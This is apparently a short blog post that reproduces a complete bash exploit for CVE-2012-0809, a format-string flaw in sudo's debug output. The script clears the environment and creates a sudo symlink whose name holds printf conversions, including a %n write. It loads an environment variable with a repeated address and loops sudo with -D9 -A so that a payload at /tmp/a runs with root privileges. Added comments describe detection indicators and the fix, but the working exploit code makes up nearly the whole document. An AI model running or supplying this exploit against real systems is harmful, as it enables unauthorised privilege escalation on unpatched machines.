CVE-2012-0809 Exploit

April 28, 2014 - 1 minute read -
exploit
#!/bin/bash
# CVE-2012-0809 exploit
# joernchen of Phenoelit's version
# Payload to be executed goes to /tmp/a (might be a shell script)
#
# Defensive reading of this script (what the visible lines actually do):
#  - Everything happens in /tmp. The only external inputs are the file
#    /tmp/a (the payload named above) and the installed /usr/bin/sudo.
#  - The whole environment is wiped, PATH included, which is why every
#    command below is spelled with an absolute path.
#  - A symlink to sudo is created whose *name* contains printf-style
#    conversions; that name becomes sudo's argv[0]. CVE-2012-0809 is a
#    format-string flaw in sudo's debug output, reached here via -D.
#  - Indicators for detection: a symlink to sudo under /tmp with '%' in
#    its name, sudo being invoked in a tight loop with -D and with
#    SUDO_ASKPASS pointing into /tmp, and a process whose environment
#    holds a ~20000-byte variable made of one repeated 4-byte value.
#    Mitigation is a sudo build in which CVE-2012-0809 is fixed; the
#    only lasting artefact this script leaves behind is /tmp/a.

# Not checked: if the cd fails, the relative ./ paths below resolve
# wherever the caller happened to be.
cd /tmp
/bin/echo '-> Clearing ENV'
# Unset every variable 'env' lists (PATH, HOME, ... everything).
# The unquoted backticks and $i are deliberate word-splitting here.
for i in `env |cut -f1 -d "="` ;do unset $i;done  
/bin/echo '-> Creating symlink'
# The symlink name is the format string: '%134520134x' is a width-padded
# hex conversion and '%900$n' a positional-parameter %n (printf's
# write-count directive). The backslash only stops the shell from
# expanding "$n".
/bin/ln -s /usr/bin/sudo ./%134520134x%900\$n
/bin/echo '-> Setting ENV'
export AAA=AAAA;
export A;
# Build A out of the 4-byte sequence 0x24 0x83 0x05 0x08 repeated 5000
# times (bash's 'echo -e' expands the \x escapes), i.e. ~20000 bytes of
# one value placed in sudo's environment. Presumably a little-endian
# address — not verifiable from the script alone.
for i in `/usr/bin/seq 1 5000`; do 
export A=$A`echo -n -e '\x24\x83\x05\x08'`;
done;

/bin/echo '-> Now a little Brute-Force'
# Repeatedly run sudo through the symlink at debug level 9 (-D9) with
# askpass mode (-A) and SUDO_ASKPASS naming the payload file from the
# header; stderr is discarded. Exit status 1 from sudo is taken as the
# stop condition — why earlier iterations end differently is not visible
# here, so treat "1 == done" as the author's empirical observation.
while true ; do SUDO_ASKPASS=/tmp/a ./%134520134x%900\$n -D9 -A id 2>/dev/null ; if [[ "$?" == "1" ]]; then break ;fi  ; done
/bin/echo '-> Cleaning up'
# Removes the symlink only; /tmp/a and the shell's modified environment
# remain, which is what a responder should look for afterwards.
/bin/rm /tmp/%134520134x%900\$n